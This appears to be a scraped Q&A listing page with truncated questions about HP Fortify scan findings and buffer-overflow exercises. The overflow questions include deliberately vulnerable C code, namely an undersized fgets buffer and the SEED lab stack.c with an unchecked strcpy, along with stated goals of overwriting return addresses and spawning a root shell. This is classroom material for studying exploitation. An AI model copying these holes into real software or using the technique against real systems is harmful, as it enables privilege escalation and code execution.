fortify-source

HP Fortify : ASP.NET Bad Practices: Non-Serializable Object Stored in Session

徘徊边缘 提交于 2021-02-08 15:15:31
问题 The method set_UserActiveEnvironments() in HttpContextHelper.cs stores a non-serializable object as an HttpSessionState attribute on line 47, which can damage application reliability By default, ASP.NET servers store the HttpSessionState object, its attributes and any objects they reference in memory. This model limits active session state to what can be accommodated by the system memory of a single machine. In order to expand capacity beyond these limitations, servers are frequently

HP Fortify : ASP.NET Bad Practices: Non-Serializable Object Stored in Session

旧巷老猫 提交于 2021-02-08 15:14:28
问题 The method set_UserActiveEnvironments() in HttpContextHelper.cs stores a non-serializable object as an HttpSessionState attribute on line 47, which can damage application reliability By default, ASP.NET servers store the HttpSessionState object, its attributes and any objects they reference in memory. This model limits active session state to what can be accommodated by the system memory of a single machine. In order to expand capacity beyond these limitations, servers are frequently

Fortify: Access Control Database related issue

青春壹個敷衍的年華 提交于 2020-01-02 10:20:55
问题 we have been using fortify tool in our code to check for security vulnerabilities. We were able to fix most of the issues, but there are some issues which we are finding it hard to fix.One of it is related to access control database related issues.WE use hibernate criteria within our code to fetch records from DB and foritfy complains that the data which get from DB and place into program is from untrusted source.Below is the same code Criteria criteria = hibernatessn.createCriteria("com.vish

Buffer overflow works in gdb but not without it

我是研究僧i 提交于 2019-12-27 16:28:15
问题 I am on CentOS 6.4 32 bit and am trying to cause a buffer overflow in a program. Within GDB it works. Here is the output: [root@localhost bufferoverflow]# gdb stack GNU gdb (GDB) Red Hat Enterprise Linux (7.2-60.el6_4.1) Copyright (C) 2010 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and

Buffer overflow works in gdb but not without it

随声附和 提交于 2019-12-27 16:26:06
问题 I am on CentOS 6.4 32 bit and am trying to cause a buffer overflow in a program. Within GDB it works. Here is the output: [root@localhost bufferoverflow]# gdb stack GNU gdb (GDB) Red Hat Enterprise Linux (7.2-60.el6_4.1) Copyright (C) 2010 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and

How to run HP fortify scan using gradle or Running Fortify from Gradle build on Jenkins

偶尔善良 提交于 2019-12-24 04:56:31
问题 I'm using the following code to run fortify using Gradle, but this code takes time to generate reports, I'm not sure how to optimize this script to run faster, it will be great if someone can help me to optimize this script // Add a new configuration configurations { fortify { extendsFrom compile } } // pull in the fortify libs for the new configuration dependencies { fortify fileTree(dir: 'C:/Program Files/Fortify Software/HP Fortify v3.20/Core/lib', include: '*.jar') } task fortifyReport

Causing a buffer Overflow with fgets

≯℡__Kan透↙ 提交于 2019-12-19 05:24:11
问题 I'm experimenting with buffer overflows and try to overwrite the return address of the stack with a certain input of fgets This is the code: void foo() { fprintf(stderr, "You did it.\n"); } void bar() { char buf[20]; puts("Input:"); fgets(buf, 24, stdin); printf("Your input:.\n", strlen(buf)); } int main(int argc, char **argv) { bar(); return 0; } On a normal execution the program just returns your input. I want it to output foo() without modifying the code. My idea was to overflow the buffer

How can I invoke buffer overflow?

隐身守侯 提交于 2019-12-18 10:16:10
问题 I got a homework assignment asking me to invoke a function without explicitly calling it, using buffer overflow. The code is basically this: #include <stdio.h> #include <stdlib.h> void g() { printf("now inside g()!\n"); } void f() { printf("now inside f()!\n"); // can only modify this section // cant call g(), maybe use g (pointer to function) } int main (int argc, char *argv[]) { f(); return 0; } Though I'm not sure how to proceed. I thought about changing the return address for the program

Buffer Overflow Vulnerability Lab problems

左心房为你撑大大i 提交于 2019-12-13 00:42:42
问题 I have a lab assignment that I am stuck on. Basically, I have to take advantage of a buffer overflow to generate a shell that has root privileges. I have to use 2 separate .c files. Here is the first one: stack.c #include <stdlib.h> #include <stdio.h> #include <string.h> int bof(char *str) { char buffer[12]; //BO Vulnerability strcpy(buffer,str); return 1; } int main(int argc, char* argv[]) { char str[517]; FILE *badfile; badfile = fopen("badfile","r"); fread(str, sizeof(char),517, badfile);

Buffer Overflow - SegFaults in regular user

依然范特西╮ 提交于 2019-12-10 06:31:33
问题 Below is my code, both the vulnerable program (stack.c) and my exploit (exploit.c). This code works on a pre-packaged Ubuntu 9 that the prof sent out for windows users (I had a friend test it on his computer), but on Ubuntu 12 that I run on my iMac, i get segfaults when I try and do this in a normal user. here's stack: //stack.c #include <stdio.h> int bof(char *str) { char buffer[12]; //BO Vulnerability strcpy(buffer,str); return 1; } int main(int argc, char* argv[]) { char str[517]; FILE